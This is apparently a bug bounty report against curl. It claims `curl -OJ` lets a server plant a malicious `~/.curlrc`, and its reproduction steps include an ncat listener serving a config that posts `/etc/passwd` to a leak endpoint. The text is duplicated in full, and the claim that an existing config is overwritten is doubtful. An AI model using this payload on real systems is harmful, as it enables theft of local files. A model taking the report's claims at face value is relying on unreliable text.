Description
## Summary:
When a user runs `curl -OJ <url>`, a malicious server can force the response to be saved as `.curlrc` in the working directory. If the user executes the download from their home directory (a common workflow), the attacker overwrites `~/.curlrc`. Subsequent `curl` invocations automatically load this configuration file before processing command-line arguments, allowing the attacker to silently exfiltrate local files or proxy future requests.
Used AI to refine the text
## Affected version
```bash
djamelghorab@DESKTOP-VUFM4GM:~$ curl -V
curl 8.5.0 (x86_64-pc-linux-gnu) libcurl/8.5.0 OpenSSL/3.0.13 zlib/1.3 brotli/1.1.0 zstd/1.5.5 libidn2/2.3.7 libpsl/0.21.2 (+libidn2/2.3.7) libssh/0.10.6/openssl/zlib nghttp2/1.59.0 librtmp/2.3 OpenLDAP/2.6.7
Release-Date: 2023-12-06, security patched: 8.5.0-2ubuntu10.6
Protocols: dict file ftp ftps gopher gophers http https imap imaps ldap ldaps mqtt pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd
```
## Steps To Reproduce:
1. Start a listener that serves a malicious payload:
```sh
cat <<'EOF' | ncat -l 8000 --keep-open
HTTP/1.1 200 OK
Content-Length: 63
Content-Disposition: attachment; filename=".curlrc"
url = "http://127.0.0.1:8000/leak"
data = "@/etc/passwd"
EOF
```
2. From the target's home directory, download the file with `curl -OJ http://127.0.0.1:8000/pwn`. The transfer creates `~/.curlrc` populated with the attacker's directives.
3. The next time the victim runs a routine command such as `curl https://example.com`, the tool processes the injected configuration first and silently exfiltrates `/etc/passwd` to `http://127.0.0.1:8000/leak` before issuing the user-requested transfer.
## Supporting Material/References:
{F5010008}
When a user runs `curl -OJ <url>`, a malicious server can force the response to be saved as `.curlrc` in the working directory. If the user executes the download from their home directory (a common workflow), the attacker overwrites `~/.curlrc`. Subsequent `curl` invocations automatically load this configuration file before processing command-line arguments, allowing the attacker to silently exfiltrate local files or proxy future requests.
Used AI to refine the text
## Affected version
```bash
djamelghorab@DESKTOP-VUFM4GM:~$ curl -V
curl 8.5.0 (x86_64-pc-linux-gnu) libcurl/8.5.0 OpenSSL/3.0.13 zlib/1.3 brotli/1.1.0 zstd/1.5.5 libidn2/2.3.7 libpsl/0.21.2 (+libidn2/2.3.7) libssh/0.10.6/openssl/zlib nghttp2/1.59.0 librtmp/2.3 OpenLDAP/2.6.7
Release-Date: 2023-12-06, security patched: 8.5.0-2ubuntu10.6
Protocols: dict file ftp ftps gopher gophers http https imap imaps ldap ldaps mqtt pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd
```
## Steps To Reproduce:
1. Start a listener that serves a malicious payload:
```sh
cat <<'EOF' | ncat -l 8000 --keep-open
HTTP/1.1 200 OK
Content-Length: 63
Content-Disposition: attachment; filename=".curlrc"
url = "http://127.0.0.1:8000/leak"
data = "@/etc/passwd"
EOF
```
2. From the target's home directory, download the file with `curl -OJ http://127.0.0.1:8000/pwn`. The transfer creates `~/.curlrc` populated with the attacker's directives.
3. The next time the victim runs a routine command such as `curl https://example.com`, the tool processes the injected configuration first and silently exfiltrates `/etc/passwd` to `http://127.0.0.1:8000/leak` before issuing the user-requested transfer.
## Supporting Material/References:
{F5010008}
Basic Information
ID
H1:3427194
Published
Nov 15, 2025 at 15:47
Modified
Nov 15, 2025 at 22:32